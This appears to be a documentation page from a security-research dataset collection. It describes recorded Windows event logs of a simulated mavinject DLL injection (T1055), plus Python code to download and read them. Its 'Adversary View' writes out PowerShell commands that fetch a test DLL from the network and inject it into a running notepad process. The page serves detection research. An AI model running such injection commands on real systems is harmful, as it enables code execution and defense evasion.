Mavinject Process DLL Injection#

Metadata#

Contributors

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2020/10/19

Modification Date

2020/10/19

Tactics

TA0004,TA0005

Techniques

T1055

Tags

art.74496461-11a1-4982-b439-4d87a550d254

Dataset Description#

This dataset represents adversaries leveraging

Simulation Metadata#

Tools#

type

Name

Module

Manual

powershell

powershell

Adversary View#

PS C:\Users\wardog> Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/src/x64/T1055.dll" -OutFile C:\ProgramData\T1055.dll
PS C:\Users\wardog> $mypid = (Start-Process notepad -PassThru).id
PS C:\Users\wardog> mavinject $mypid /INJECTRUNNING C:\ProgramData\T1055.dll

Explore Datasets#

Download & Decompress Dataset#

import requests
from zipfile import ZipFile
from io import BytesIO

url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/psh_mavinject_dll_notepad.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File#

from pandas.io import json

df = json.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events#

df.groupby(['Channel']).size().sort_values(ascending=False)